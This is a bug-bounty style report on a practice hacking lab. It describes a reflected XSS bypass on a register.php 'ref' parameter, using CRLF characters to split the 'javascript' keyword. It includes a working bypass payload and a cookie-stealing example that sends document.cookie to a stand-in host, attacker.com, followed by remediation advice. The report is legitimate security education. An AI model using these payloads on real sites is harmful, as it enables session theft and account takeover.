FirstBlood-#368Reflected XSS on register.php through the ref parameter [Bypass]
This issue was discovered on FirstBlood v2



On 2021-10-25, holybugx Level 5 reported:

Description

Hello Sean,

Reflected XSS is possible on the /register.php endpoint through the ref parameter. This is a bypass to the previous report. As the fix was not properly implemented, I was able to once again achieve XSS on this endpoint which results in a one-click account takeover.

Steps To Reproduce

  • Open the following URL and click on Return to previous page, the XSS executes:

https://firstbloodhackers.com/register.php?ref=j%0D%0Aav%0D%0Aas%0D%0Acrip%0D%0At%0D%0A:confirm`1`

As observed, the mentioned payload bypasses the implemented mitigation.

Filter Bypassing

The developer tried to filter various special characters e.g. < " > as well as filtering the java keyword to prevent the javascript scheme XSS payloads.

The developer did a great job in this manner, as the keywords are properly swapped with the nope keyword, making the following payload fail:

However, the checks are only working when the java keyword exists. Using the Carriage Return Line Feed characters, I was able to break the filter:

j%0D%0Aav%0D%0Aas%0D%0Acrip%0D%0At%0D%0A:confirm`1`

The above payload is valid and results in a bypass to the filtering used by the developer.

Exploitation

An attacker can craft a payload to steal the victim's cookies, and to take over their accounts:

https://firstbloodhackers.com/register.php?ref=j%0D%0Aav%0D%0Aas%0D%0Acrip%0D%0At%0D%0A:window.location.href=`http://attacker.com/${document.cookie}`

Where http://attacker.com is the attacker's server. Opening the above link and clicking the Return to previous page results in a redirection to the attacker's controlled server and the cookies will be sent over as well.

  • This is how an attacker receives the requests and the victim's cookies:

An attacker can use the cookies to takeover various user's accounts including the drAdmin account.

Impact

  • XSS leading to one-click account takeover of various users and admins.

Remediation

  • Implement proper sanitization on the ref parameter.
  • Set httponly cookies so that javascript can not access the cookies.
  • Remove/Expire the drps cookies after logging out.

Kind Regards,

HolyBugx

P3 Medium

Endpoint: /register.php

Parameter: ref

Payload: j%0D%0Aav%0D%0Aas%0D%0Acrip%0D%0At%0D%0A:confirm`1`


FirstBlood ID: 32
Vulnerability Type: Reflective XSS

The parameter ?ref on register.php was poorly fixed and can be bypassed in various ways. Firstly the developer failed to use strtolower() when comparing strings, and the use of characters such as %09 will also bypass the filter.